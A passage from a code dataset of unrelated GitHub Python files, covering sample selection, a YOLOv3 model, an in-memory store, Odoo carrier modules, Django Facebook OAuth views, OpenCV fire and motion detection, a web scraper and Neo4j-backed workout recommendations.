index=False)\ncommon_ls_meta.to_csv(f'{dir_out}/selected_sample_list_in_common_v2.csv', index=False)\n\n#%%----------------- With the final list, check if the sample has both OD and FF parts-------------------------------\ndir_in =r'D:\\GoogleDrive\\Projects_ongoing\\shift\\data\\meta'\ndf_od_final = pd.read_csv(f'{dir_out}/selected_samples_final_correctdate.csv')\ndf_inv = pd.read_csv(f'{dir_in}/processed/SHIFT_sample_inventory_20230308.csv')\n# Clean the df_inv\ndf_inv = df_inv[df_inv['Sample Number'] != '131_flower']\ndf_inv = df_inv[df_inv['Sample Number'] != '161_S'].reset_index(drop=True)\n\n# FF sample list from df_inv\nn_ff = df_inv.loc[df_inv['Type']=='FF', 'Sample Number'].astype(int)\nn_od_final = df_od_final['sample number'].astype(int)\nn_common = set(n_od_final).intersection(n_ff)\nn_dif = set(n_od_final).difference(n_ff)\ndf_common = df_od_final[df_od_final['sample number'].isin(n_common)]\ndf_common.to_csv(f'{dir_out}/selected_sample_final_wt_od_ff.csv', index=False)\npd.DataFrame(n_dif).to_csv(f'{dir_out}/no_FF_samples.csv')\n\n# Overall comparison\ndf_iform = pd.read_csv(f'{dir_in}/processed/sample_list_simplified_ORNL_v3.csv', encoding='unicode_escape')\nNPV_BK = df_iform.loc[((df_iform['Species or type'] == 'NPV') | (df_iform['Species or type'] == 'Bulk sample')) & (df_iform['Sample Taken?'] == 'Yes'), 'Sample Number']\nNPV_BK = list(NPV_BK[~NPV_BK.isna()].astype(int))\n\n# only keep od and FF from inventory\ndf_inv = df_inv[(df_inv['Type']=='OD') | (df_inv['Type']=='FF')]\n# drop NPV from inventory\nidx = ~df_inv['Sample Number'].astype(int).isin(NPV_BK)\ndf_inv = df_inv[idx]\n\nn_od = df_inv.loc[df_inv['Type']=='OD', 'Sample Number'].unique().astype(int)\nn_ff = df_inv.loc[df_inv['Type']=='FF', 'Sample Number'].unique().astype(int)\n\nn_com = set(n_ff).intersection(set(n_od))\nn_ff_only = set(n_ff).difference(set(n_od))\nn_od_only = set(n_od).difference(set(n_ff))\n\npd.DataFrame(n_ff_only).to_csv(f'{dir_in}/UWM_inv_sort/FF_only_in_inv_exclude_NPV_BK.csv', index=False)\npd.DataFrame(n_od_only).to_csv(f'{dir_in}/UWM_inv_sort/OD_only_in_inv_exclude_NPV_BK.csv', index=False)\npd.DataFrame(n_com).to_csv(f'{dir_in}/UWM_inv_sort/OD_and_FF_in_inv_exclude_NPV_BK.csv', index=False)\n\n#%%-------------------------Check the final list against the most recent flash frozen list----------------\ndir_in =r'D:\\GoogleDrive\\Projects_ongoing\\shift\\data\\meta'\ndf_od_final = pd.read_csv(f'{dir_in}/selected_samples_final_correctdate.csv')\ndf_od_done = pd.read_csv(f'{dir_in}/selected_sample_final_wt_od_ff.csv')\ndf_ff = pd.read_csv(f'{dir_in}/raw/SHIFT_flash_frozen_UWM.csv', encoding='unicode_escape')\nn_final = df_od_final['sample number'].astype(int)\nn_ff = df_ff['sample number'].astype(int)\nn_done = df_od_done['sample number'].astype(int)\nn_com = set(n_final).intersection(set(n_ff))\nn_dif = set(n_final).difference(set(n_ff)) # {384, 1665, 259, 37, 933, 1531, 1208, 1529, 1659, 125, 1662}\nn_todo = set(n_com).difference(set(n_done))\ndf = pd.DataFrame(data=n_todo, columns=['sample number'])\ndf.to_csv(f'{dir_in}/samples_todo.csv', index=False)\n\n#%%---------------------------- select N/15N/13C samples within the sample_todo + wt_od_ff list\ndir_in =r'D:\\GoogleDrive\\Projects_ongoing\\shift\\data\\meta'\ndir_t = r'D:\\GoogleDrive\\Projects_ongoing\\shift\\data\\traits'\ndir_spec = r'D:\\GoogleDrive\\Projects_ongoing\\shift\\data\\spectra\\OD'\n\ndf_od_done = pd.read_csv(f'{dir_in}/selected_sample_final_wt_od_ff.csv')\ndf_ff = pd.read_csv(f'{dir_in}/samples_todo.csv')\ndf_t = pd.read_csv(f'{dir_t}/shift_DS_Predict_NEON_v3.csv')\ndf_spec = pd.read_csv(f'{dir_spec}/ovendried_spectra_sample_mean.csv')\ndf_spec['sample number'] = df_spec['sample_ID'].str.split('_').str.get(1).astype(int)\n\n# target list\ntgt = list(df_od_done['sample number'].astype(int)) + list(df_ff['sample number'].astype(int))\nidx = df_spec['sample number'].isin(tgt)\ndf_trait = df_t.loc[idx, ['d13C_M', 'd15N_M', 'Nitrogen_M']].reset_index(drop=True)\ntgt_sample = df_spec.loc[idx, 'sample number'].reset_index(drop=True)\ntraits = df_trait.values\nratio = 1 - 36/traits.shape[0]\n\nx_train_index, x_test_index = kennardstone(traits, test_size=ratio)\nselect_traits = traits[x_train_index, :]\nsample_select = tgt_sample[x_train_index]\nsample_select = pd.DataFrame(data=sample_select, columns=['sample number'])\nsample_select.to_csv(f'{dir_in}/36_isotope_samples.csv', index=False)\n","repo_name":"SeltaZheng/shift_traits","sub_path":"LeafSample/SampleSelection.py","file_name":"SampleSelection.py","file_ext":"py","file_size_in_byte":15381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72353363290","text":"# -*- coding: utf-8 -*-\n# Written by yq_yao\n# \nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport torch.nn.init as init\nfrom model.darknet53 import Darknet53\nimport os\nfrom utils.box_utils import permute_sigmoid, decode\nfrom layers.yolo_layer import YoloLayer\n\ndef xavier(param):\n init.xavier_uniform(param)\n\n# kaiming_weights_init\ndef weights_init(m):\n for key in m.state_dict():\n if key.split('.')[-1] == 'weight':\n if 'conv' in key:\n init.kaiming_normal_(m.state_dict()[key], mode='fan_out')\n if 'bn' in key:\n m.state_dict()[key][...] = 1\n elif key.split('.')[-1] == 'bias':\n m.state_dict()[key][...] = 0\n\n\n# def weights_init(m):\n# for key in m.state_dict():\n# if key.split('.')[-1] == 'weight':\n# if 'conv' in key:\n# init.xavier_uniform(m.state_dict()[key])\n# if 'bn' in key:\n# m.state_dict()[key][...] = 1\n# elif key.split('.')[-1] == 'bias':\n# m.state_dict()[key][...] = 0\n\nclass ConvBN(nn.Module):\n def __init__(self, ch_in, ch_out, kernel_size=3, stride=1, padding=0):\n super().__init__()\n self.conv = nn.Conv2d(ch_in, ch_out, kernel_size=kernel_size, stride=stride, padding=padding, bias=False)\n self.bn = nn.BatchNorm2d(ch_out, momentum=0.01)\n\n def forward(self, x):\n return F.leaky_relu(self.bn(self.conv(x)), negative_slope=0.1, inplace=True)\n\nclass DetectionLayer(nn.Module):\n def __init__(self, anchors, anchors_mask, input_wh, num_classes):\n super(DetectionLayer, self).__init__()\n self.anchors = anchors\n self.input_wh = input_wh\n self.anchors_mask = anchors_mask\n self.num_classes = num_classes\n \n def forward(self, x):\n l_data, m_data, h_data = x\n l_grid_wh = (l_data.size(3), l_data.size(2))\n m_grid_wh = (m_data.size(3), m_data.size(2))\n h_grid_wh = (h_data.size(3), h_data.size(2))\n\n pred_l, stride_l = permute_sigmoid(l_data, self.input_wh, 3, self.num_classes)\n pred_m, stride_m = permute_sigmoid(m_data, self.input_wh, 3, self.num_classes)\n pred_h, stride_h = permute_sigmoid(h_data, self.input_wh, 3, self.num_classes)\n\n anchors1 = self.anchors[self.anchors_mask[0][0]: self.anchors_mask[0][-1]+1]\n anchors2 = self.anchors[self.anchors_mask[1][0]: self.anchors_mask[1][-1]+1]\n anchors3 = self.anchors[self.anchors_mask[2][0]: self.anchors_mask[2][-1]+1]\n \n decode_l = decode(pred_l.detach(), self.input_wh, anchors1, self.num_classes, stride_l)\n decode_m = decode(pred_m.detach(), self.input_wh, anchors2, self.num_classes, stride_m)\n decode_h = decode(pred_h.detach(), self.input_wh, anchors3, self.num_classes, stride_h)\n decode_pred = torch.cat((decode_l, decode_m, decode_h), 1)\n\n return decode_pred\n\ndef predict_conv_list1(num_classes):\n layers = list()\n layers += [ConvBN(1024, 512, kernel_size=1, stride=1, padding=0)]\n layers += [ConvBN(512, 1024, kernel_size=3, stride=1, padding=1)]\n layers += [ConvBN(1024, 512, kernel_size=1, stride=1, padding=0)]\n layers += [ConvBN(512, 1024, kernel_size=3, stride=1, padding=1)]\n layers += [ConvBN(1024, 512, kernel_size=1, stride=1, padding=0)]\n layers += [ConvBN(512, 1024, kernel_size=3, stride=1, padding=1)]\n layers += [nn.Conv2d(1024, (5 + num_classes) * 3, kernel_size=1, stride=1, padding=0)]\n return layers\n\ndef predict_conv_list2(num_classes):\n layers = list()\n layers += [ConvBN(768, 256, kernel_size=1, stride=1, padding=0)]\n layers += [ConvBN(256, 512, kernel_size=3, stride=1, padding=1)]\n layers += [ConvBN(512, 256, kernel_size=1, stride=1, padding=0)]\n layers += [ConvBN(256, 512, kernel_size=3, stride=1, padding=1)]\n layers += [ConvBN(512, 256, kernel_size=1, stride=1, padding=0)]\n layers += [ConvBN(256, 512, kernel_size=3, stride=1, padding=1)]\n layers += [nn.Conv2d(512, (5 + num_classes) * 3, kernel_size=1, stride=1, padding=0)]\n return layers\n\ndef predict_conv_list3(num_classes):\n layers = list()\n layers += [ConvBN(384, 128, kernel_size=1, stride=1, padding=0)]\n layers += [ConvBN(128, 256, kernel_size=3, stride=1, padding=1)]\n layers += [ConvBN(256, 128, kernel_size=1, stride=1, padding=0)]\n layers += [ConvBN(128, 256, kernel_size=3, stride=1, padding=1)]\n layers += [ConvBN(256, 128, kernel_size=1, stride=1, padding=0)]\n layers += [ConvBN(128, 256, kernel_size=3, stride=1, padding=1)]\n layers += [nn.Conv2d(256, (5 + num_classes) * 3, kernel_size=1, stride=1, padding=0)]\n return layers\n\nclass YOLOv3(nn.Module):\n def __init__(self, phase, num_blocks, anchors, anchors_mask, input_wh, num_classes):\n super().__init__()\n self.phase = phase\n self.extractor = Darknet53(num_blocks)\n self.predict_conv_list1 = nn.ModuleList(predict_conv_list1(num_classes))\n self.smooth_conv1 = ConvBN(512, 256, kernel_size=1, stride=1, padding=0)\n self.predict_conv_list2 = nn.ModuleList(predict_conv_list2(num_classes))\n self.smooth_conv2 = ConvBN(256, 128, kernel_size=1, stride=1, padding=0)\n self.predict_conv_list3 = nn.ModuleList(predict_conv_list3(num_classes))\n if phase == \"test\":\n self.detection = DetectionLayer(anchors, anchors_mask, input_wh, num_classes)\n\n def forward(self, x, targets=None):\n c3, c4, c5 = self.extractor(x)\n x = c5\n # predict_list1\n for i in range(5):\n x = self.predict_conv_list1[i](x)\n smt1 = self.smooth_conv1(x)\n smt1 = F.upsample(smt1, scale_factor=2, mode='nearest')\n\n smt1 = torch.cat((smt1, c4), 1)\n for i in range(5, 7):\n x = self.predict_conv_list1[i](x)\n out1 = x\n\n x = smt1\n for i in range(5):\n x = self.predict_conv_list2[i](x)\n smt2 = self.smooth_conv2(x)\n smt2 = F.upsample(smt2, scale_factor=2, mode='nearest')\n smt2 = torch.cat((smt2, c3), 1)\n for i in range(5, 7):\n x = self.predict_conv_list2[i](x)\n out2 = x\n x = smt2\n for i in range(7):\n x = self.predict_conv_list3[i](x)\n out3 = x\n\n if self.phase == \"test\":\n detections = self.detection((out1, out2, out3))\n return detections\n elif self.phase == \"train\":\n detections = (out1, out2, out3)\n return detections\n \n def load_weights(self, base_file):\n other, ext = os.path.splitext(base_file)\n if ext == '.pkl' or '.pth':\n print('Loading weights into state dict...')\n self.extractor.load_state_dict(torch.load(base_file))\n print(\"initing darknet53 ......\")\n self.predict_conv_list1.apply(weights_init)\n self.smooth_conv1.apply(weights_init)\n self.predict_conv_list2.apply(weights_init)\n self.smooth_conv2.apply(weights_init)\n self.predict_conv_list3.apply(weights_init)\n print('Finished!')\n else:\n print('Sorry only .pth and .pkl files supported.')\n\ndef Yolov3(phase, input_wh, anchors, anchors_mask, num_classes):\n num_blocks = [1,2,8,8,4]\n return YOLOv3(phase, num_blocks, anchors, anchors_mask, input_wh, num_classes)\n","repo_name":"yqyao/YOLOv3_Pytorch","sub_path":"model/yolo.py","file_name":"yolo.py","file_ext":"py","file_size_in_byte":7382,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"32"} +{"seq_id":"69946979293","text":"#!/usr/bin/env python\r\nfrom typing import Dict, List, Tuple, Any\r\nfrom dateutil.parser import parse as parse_date\r\n\r\nSUPPORTED_QUERY_OPERATORS = (\r\n '$ne', '$eq', '$in', '$nin', '$gt', '$gte', '$lt', '$lte'\r\n)\r\n\r\n\r\nclass Store:\r\n\r\n def __init__(self):\r\n self._store = []\r\n\r\n @staticmethod\r\n def to_dict(data: Dict) -> Dict:\r\n tmp = {}\r\n for field in data:\r\n value = data[field]\r\n\r\n if hasattr(value, \"day\") and hasattr(value, \"fromtimestamp\"):\r\n value = str(value)\r\n\r\n tmp[field] = value\r\n return tmp\r\n\r\n def insert(self, obj):\r\n self._store.append(obj)\r\n return Store.to_dict(obj)\r\n\r\n def delete(self, param_list: List[Dict]) -> List[Dict]:\r\n matched_items, unmatched_items = self._list(param_list)\r\n self._store = unmatched_items\r\n return [Store.to_dict(matched_item) for matched_item in matched_items]\r\n\r\n def update(self, param_list: List[Dict], data: Dict) -> List[Dict]:\r\n tmp = []\r\n update_items = []\r\n for item in self._store:\r\n matched = []\r\n for param in param_list:\r\n matched.append(_match_param(param, item))\r\n\r\n not_match_count = matched.count(False)\r\n\r\n if not_match_count == 0:\r\n item.update(data)\r\n update_items.append(item)\r\n\r\n tmp.append(item)\r\n\r\n self._store = tmp\r\n return [Store.to_dict(updated_item) for updated_item in update_items]\r\n\r\n def find_by_id(self, _id) -> Dict:\r\n result = self.list_objects(\r\n [{\"id\": {\"$eq\": _id}}], {\"offset\": 0, \"limit\": 1})\r\n if result:\r\n return Store.to_dict(result[0])\r\n return {}\r\n\r\n def find_by_params(self, param_list: List[Dict]) -> Dict:\r\n result = self.list_objects(param_list, {\"offset\": 0, \"limit\": 1})\r\n if result:\r\n return Store.to_dict(result[0])\r\n return {}\r\n\r\n def list_objects(\r\n self, param_list: List[Dict] = None,\r\n pagination: Dict = None) -> List[Dict]:\r\n\r\n if not param_list and not pagination:\r\n return self._store\r\n\r\n return self._list(param_list, pagination)[0]\r\n \r\n def count_objects(self, param_list: List[Dict] = None) -> Dict:\r\n if not param_list:\r\n return {\"count\": len(self._store)}\r\n\r\n return {\"count\": len(self._list(param_list)[0])}\r\n\r\n def _list(\r\n self, param_list: List[Dict],\r\n pagination: Dict = None) -> Tuple[List[Dict], List[Dict]]:\r\n unmatched_items = []\r\n matched_items = []\r\n\r\n pagination = {\r\n 'offset': 0,\r\n 'limit': len(self._store)\r\n } if not pagination else pagination\r\n offset_count = 0\r\n limit_count = 0\r\n for item in self._store:\r\n matched = []\r\n for param in param_list:\r\n matched.append(_match_param(param, item))\r\n\r\n not_matched_count = matched.count(False)\r\n\r\n if not_matched_count == 0 and \\\r\n offset_count == pagination['offset'] and \\\r\n limit_count < pagination['limit']:\r\n matched_items.append(item)\r\n limit_count += 1\r\n elif not_matched_count == 0 and offset_count < pagination['offset']:\r\n offset_count += 1\r\n else:\r\n unmatched_items.append(item)\r\n\r\n return (\r\n [Store.to_dict(matched_item) for matched_item in matched_items],\r\n [\r\n Store.to_dict(unmatched_item)\r\n for unmatched_item in unmatched_items\r\n ]\r\n )\r\n\r\n @staticmethod\r\n def _list_param_parser(param_list: List[Dict] = None):\r\n if not param_list:\r\n return param_list\r\n\r\n new_params = []\r\n\r\n for param in param_list:\r\n\r\n for qualifier in SUPPORTED_QUERY_OPERATORS:\r\n\r\n for field in param:\r\n\r\n if field.get(qualifier) == '$date':\r\n if not hasattr(\r\n param[field][qualifier],\r\n \"title\") and hasattr(\r\n param[field][qualifier], 'append'):\r\n\r\n new_params[field][qualifier] = [\r\n parse_date(date_str)\r\n for date_str in param_list[field][qualifier]]\r\n\r\n elif hasattr(param_list[field][qualifier], \"title\"):\r\n new_params[field][qualifier] = parse_date(\r\n param_list[field][qualifier])\r\n\r\n return new_params\r\n\r\n\r\ndef convert_if_date(value: Any):\r\n if hasattr(value, 'items') and hasattr(value, \"fromkeys\"):\r\n return parse_date(value[\"$date\"])\r\n return value\r\n\r\n\r\ndef _match_param(params: Dict, value: Dict) -> bool:\r\n for field in params:\r\n for operator in params[field].keys():\r\n operator_value = convert_if_date(params[field][operator])\r\n field_value = value.get(field)\r\n if operator == \"$eq\":\r\n return operator_value == field_value\r\n elif operator == \"$ne\":\r\n return operator_value != field_value\r\n elif operator == \"$lt\":\r\n return field_value < operator_value\r\n elif operator == \"$lte\":\r\n return (\r\n field_value < operator_value or\r\n field_value == operator_value\r\n )\r\n elif operator == \"$gt\":\r\n return field_value > operator_value\r\n elif operator == \"$gte\":\r\n return (\r\n field_value > operator_value or\r\n field_value == operator_value\r\n )\r\n elif operator == \"$nin\":\r\n return field_value not in operator_value\r\n elif operator == \"$in\":\r\n return field_value in operator_value\r\n","repo_name":"etsalah/taskhog","sub_path":"models/store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":6064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22927077907","text":"import base64\n\nfrom odoo import fields, models\n\n\nclass CTTExpressManifestWizard(models.TransientModel):\n _name = \"cttexpress.manifest.wizard\"\n _description = \"Get the CTT Express Manifest for the given date range\"\n\n document_type = fields.Selection(\n selection=[(\"XLSX\", \"Excel\"), (\"PDF\", \"PDF\")],\n string=\"Format\",\n default=\"XLSX\",\n required=True,\n )\n from_date = fields.Date(required=True, default=fields.Date.context_today)\n to_date = fields.Date(required=True, default=fields.Date.context_today)\n carrier_ids = fields.Many2many(\n string=\"Filter accounts\",\n comodel_name=\"delivery.carrier\",\n domain=[(\"delivery_type\", \"=\", \"cttexpress\")],\n help=\"Leave empty to gather all the CTT account manifests\",\n )\n state = fields.Selection(\n selection=[(\"new\", \"new\"), (\"done\", \"done\")],\n default=\"new\",\n readonly=True,\n )\n attachment_ids = fields.Many2many(\n comodel_name=\"ir.attachment\", readonly=True, string=\"Manifests\"\n )\n\n def get_manifest(self):\n \"\"\"List of shippings for the given dates as CTT provides them\"\"\"\n carriers = self.carrier_ids or self.env[\"delivery.carrier\"].search(\n [(\"delivery_type\", \"=\", \"cttexpress\")]\n )\n # Avoid getting repeated manifests. Carriers with different service\n # configuration would produce the same manifest.\n unique_accounts = {\n (c.cttexpress_customer, c.cttexpress_contract, c.cttexpress_agency)\n for c in carriers\n }\n filtered_carriers = self.env[\"delivery.carrier\"]\n for customer, contract, agency in unique_accounts:\n filtered_carriers += fields.first(\n carriers.filtered(\n lambda x: x.cttexpress_customer == customer\n and x.cttexpress_contract == contract\n and x.cttexpress_agency == agency\n )\n )\n for carrier in filtered_carriers:\n ctt_request = carrier._ctt_request()\n from_date = fields.Date.to_string(self.from_date)\n to_date = fields.Date.to_string(self.to_date)\n error, manifest = ctt_request.report_shipping(\n \"ODOO\", self.document_type, from_date, to_date\n )\n carrier._ctt_check_error(error)\n carrier._ctt_log_request(ctt_request)\n for _filename, file in manifest:\n filename = \"{}{}{}-{}-{}.{}\".format(\n carrier.cttexpress_customer,\n carrier.cttexpress_contract,\n carrier.cttexpress_agency,\n from_date.replace(\"-\", \"\"),\n to_date.replace(\"-\", \"\"),\n self.document_type.lower(),\n )\n self.attachment_ids += self.env[\"ir.attachment\"].create(\n {\n \"datas\": base64.b64encode(file),\n \"name\": filename,\n \"res_model\": self._name,\n \"res_id\": self.id,\n \"type\": \"binary\",\n }\n )\n self.state = \"done\"\n return dict(\n self.env[\"ir.actions.act_window\"]._for_xml_id(\n \"delivery_cttexpress.action_delivery_cttexpress_manifest_wizard\"\n ),\n res_id=self.id,\n )\n","repo_name":"OCA/delivery-carrier","sub_path":"delivery_cttexpress/wizards/cttexpress_manifest_wizard.py","file_name":"cttexpress_manifest_wizard.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"32"} +{"seq_id":"3359506630","text":"import base64\r\nimport cgi\r\nimport hashlib\r\nimport hmac\r\nimport time\r\nimport logging\r\nimport urllib\r\n\r\nfrom django.contrib.auth.models import User\r\nfrom django.utils import simplejson\r\nfrom django.conf import settings\r\nfrom django.http import HttpResponseRedirect, HttpResponse\r\nfrom django.contrib.auth import login as django_login, \\\r\n authenticate as django_authenticate, logout as django_logout\r\n\r\nfrom google.appengine.api import users\r\n\r\ndef parse_cookie(value):\r\n \"\"\"Parses and verifies a cookie value from set_cookie\"\"\"\r\n if not value: return None\r\n parts = value.split(\"|\")\r\n if len(parts) != 3: return None\r\n if cookie_signature(parts[0], parts[1]) != parts[2]:\r\n logging.warning(\"Invalid cookie signature %r\", value)\r\n return None\r\n timestamp = int(parts[1])\r\n if timestamp < time.time() - 30 * 86400:\r\n logging.warning(\"Expired cookie %r\", value)\r\n return None\r\n try:\r\n return base64.b64decode(parts[0]).strip()\r\n except:\r\n return None\r\n\r\n\r\ndef cookie_signature(*parts):\r\n \"\"\"Generates a cookie signature.\r\n\r\n We use the Facebook app secret since it is different for every app (so\r\n people using this example don't accidentally all use the same secret).\r\n \"\"\"\r\n hash = hmac.new(settings.FACEBOOK_APP_SECRET, digestmod=hashlib.sha1)\r\n for part in parts: hash.update(part)\r\n return hash.hexdigest()\r\n\r\ndef set_cookie(response, name, value, domain=None, path=\"/\", max_age=None):\r\n \"\"\"Generates and signs a cookie for the give name/value\"\"\"\r\n timestamp = str(int(time.time()))\r\n value = base64.b64encode(value)\r\n signature = cookie_signature(value, timestamp)\r\n response.set_cookie(name,\r\n \"|\".join([value, timestamp, signature]),\r\n max_age=max_age,\r\n path='/',\r\n domain=domain)\r\n\r\n# redirects to the google user api generated login url\r\ndef login(request):\r\n verification_code = request.GET.get(\"code\")\r\n if verification_code:\r\n return authenticate(request)\r\n args = dict(client_id=settings.FACEBOOK_APP_ID, redirect_uri=request.build_absolute_uri())\r\n scope = \"publish_stream,friends_relationships,offline_access, friends_of_friends\"\r\n return HttpResponseRedirect('https://graph.facebook.com/oauth/authorize?scope=%s&%s' %\r\n (scope, urllib.urlencode(args)))\r\n\r\n\r\n# redirects to the google user api generated login url\r\ndef logout(request):\r\n django_logout(request)\r\n return HttpResponseRedirect(users.create_logout_url(\"/\"))\r\n\r\n\r\n\r\ndef authenticate(request):\r\n user = django_authenticate(request=request)\r\n if user is not None:\r\n django_login(request, user)\r\n #redirect to valid login page\r\n response = HttpResponseRedirect(request.GET.get('next', '/'))\r\n set_cookie(response, \"fb_user\", user.id,\r\n max_age=30 * 86400)\r\n return response\r\n else:\r\n # return invalid login page\r\n return HttpResponse('Invalid', 'text/plain')","repo_name":"burgalon/django-facebook-oauth-backend","sub_path":"facebook/auth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"31327178562","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom odoo import models, _\r\n\r\n\r\nclass AccountEdiFormat(models.Model):\r\n _inherit = 'account.edi.format'\r\n\r\n\r\n # Override original method\r\n def _create_invoice_cfdi_attachment(self, invoice, data):\r\n cfdit = {\r\n 'in_invoice': 'Bill',\r\n 'in_refund': 'Bill-Refund',\r\n 'out_invoice': 'Invoice',\r\n 'out_refund': 'Invoice-Refund'\r\n }\r\n cfdi_filename = (\"%s-%s-MX-%s.xml\" % (\r\n invoice.journal_id.code, invoice.payment_reference,\r\n cfdit.get(invoice.move_type))).replace('/', '')\r\n description = (_('Mexican %s CFDI generated for the %s document.') % (cfdit.get(invoice.move_type), invoice.name))\r\n\r\n return self._create_cfdi_attachment(cfdi_filename, description, invoice, data)","repo_name":"liaohanzhen/custom_14","sub_path":"l10n_mx_edi_vendor_bills/models/account_edi_format.py","file_name":"account_edi_format.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70378940251","text":"import cv2\nimport numpy as np\n\nvideo = cv2.VideoCapture(0)\n \nwhile True:\n (ret, frame) = video.read()\n\n blur = cv2.GaussianBlur(frame, (21, 21), 0)\n hsv = cv2.cvtColor(blur, cv2.COLOR_BGR2HSV)\n \n lower = [18, 50, 50]\n upper = [35, 255, 255]\n lower = np.array(lower, dtype=\"uint8\")\n upper = np.array(upper, dtype=\"uint8\")\n mask = cv2.inRange(hsv, lower, upper)\n \n output = cv2.bitwise_and(frame, hsv, mask=mask)\n no_red = cv2.countNonZero(mask)\n \n cv2.imshow(\"output\", output)\n \n if int(no_red) > 20000:\n print ('Fire detected')\n \n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \ncv2.destroyAllWindows()\nvideo.release()\n","repo_name":"christian0101/Firewatch","sub_path":"fireDetectionColourBased.py","file_name":"fireDetectionColourBased.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"24578880478","text":"import cv2\n\ncap = cv2.VideoCapture('film.mp4')\nfgbg=cv2.createBackgroundSubtractorMOG2(detectShadows=False)\n\nwhile(1):\n ret,frame=cap.read()\n fgmask = fgbg.apply(frame)\n median = cv2.medianBlur(fgmask,3)\n\n (contours,hierarchy)=cv2.findContours(median.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n\n for c in contours:\n if cv2.contourArea(c) < 500:\n continue\n (x,y,w,h)=cv2.boundingRect(c)\n cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),3)\n\n background = cv2.resize(median,(600,360))\n frame1 = cv2.resize(frame,(600,360))\n\n cv2.imshow('background',background)\n cv2.imshow('frame',frame1)\n\n k = cv2.waitKey(1) & 0xff\n if k==27:\n break\ncap.release()\ncv2.destroyAllWindows()","repo_name":"hasanilteris/Simple-Tracking","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41593224542","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: 可以叫我才哥\n\"\"\"\n\nimport requests\nimport re\nimport pandas as pd\nimport html\nfrom lxml import etree\nimport time\n\n\ndef get_html(url):\n time.sleep(1)\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36\",\n }\n\n r = requests.get(url, headers=headers)\n\n # 请求的网页数据中有网页特殊字符,通过以下方法进行解析\n r = html.unescape(r.text)\n r = re.sub(':\\xa0', '', r)\n\n return r\n\n\nurl = 'https://www.douban.com/doulist/110567393/'\nr = get_html(url)\n# 获取全部URL地址\nr_text = re.sub(r'\\s','',r)\nurls = re.findall(r'(:Exercise{{id: {exercise.id}}})\n WHERE e.id IN [{','.join(map(lambda i: str(i), workout.exercises.all().values_list('id', flat=True)))}]\n SET rel.times = rel.times + 1\n \"\"\")\n session.run(f\"\"\"\n MATCH (e:Exercise)<-[rel:{Exercise.EXERCISE_RELATIONSHIP}]-(:Exercise{{id: {exercise.id}}})\n WHERE e.id IN [{','.join(map(lambda i: str(i), workout.exercises.all().values_list('id', flat=True)))}]\n SET rel.times = rel.times + 1\n \"\"\")\n session.run(f\"\"\"\n MATCH (e1:Exercise)\n MATCH (e2:Exercise{{id: {exercise.id}}})\n WHERE e1.id IN [{','.join(map(lambda i: str(i), workout.exercises.all().values_list('id', flat=True)))}] AND NOT (e1)-[:{Exercise.EXERCISE_RELATIONSHIP}]-(e2)\n CREATE (e1)-[rel:{Exercise.EXERCISE_RELATIONSHIP}{{times:1}}]->(e2)\n CREATE (e1)<-[rel2:{Exercise.EXERCISE_RELATIONSHIP}{{times:1}}]-(e2)\n \"\"\")\n session.run(f\"\"\"\n MATCH (:User)-[rel:{Exercise.USER_RELATIONSHIP}]->(:Exercise{{id: {exercise.id}}})\n SET rel.times = rel.times + 1\n \"\"\")\n session.run(f\"\"\"\n MATCH (u:User)\n MATCH (e:Exercise{{id: {exercise.id}}})\n WHERE NOT (u)-[:{Exercise.USER_RELATIONSHIP}]-(e)\n CREATE (u)-[rel:{Exercise.USER_RELATIONSHIP}{{times:1}}]->(e)\n \"\"\")\n workout.exercises.add(exercise)\n workout.save()\n\n return Response(\n self.serializer_class(workout, context={'request': request}).data,\n status=status.HTTP_200_OK\n )\n\nclass ExerciseRecommendationView(APIView):\n \"\"\" View to get exercise recommendations based on an ongoing workout \"\"\"\n\n permission_classes = [IsAuthenticated]\n serializer_class = ExerciseSerializer\n\n TIMES_WEIGHT = 0.7\n RATING_WEIGHT = 0.3\n\n def get(self, request, workout_id):\n \"\"\" Gets recommendations for exercises in a workout \"\"\"\n workout = Workout.objects.get(id=workout_id)\n if workout.user != request.user:\n return Response(\n {\"message\": \"You do not have access to the Workout\"},\n status=status.HTTP_401_UNAUTHORIZED\n )\n with neo4j.session() as session:\n result = session.run(f\"\"\"\n MATCH (e:Exercise)-[rel]->(e2:Exercise)\n WHERE e.id IN [{','.join(map(lambda i: str(i), workout.exercises.all().values_list('id', flat=True)))}] AND NOT e2.id IN [{','.join(map(lambda i: str(i), workout.exercises.all().values_list('id', flat=True)))}]\n WITH e2, rel, sum(rel.times) as total_relationships \n ORDER BY (0.7 * rel.times/total_relationships) + (0.3 * e2.rating/5) DESC\n RETURN collect(DISTINCT e2.id)\"\"\")\n exercises = [Exercise.objects.get(id=i) for i in result.value()[0]]\n return Response(\n self.serializer_class(exercises, context={'request': request}, many=True).data,\n status=status.HTTP_200_OK\n 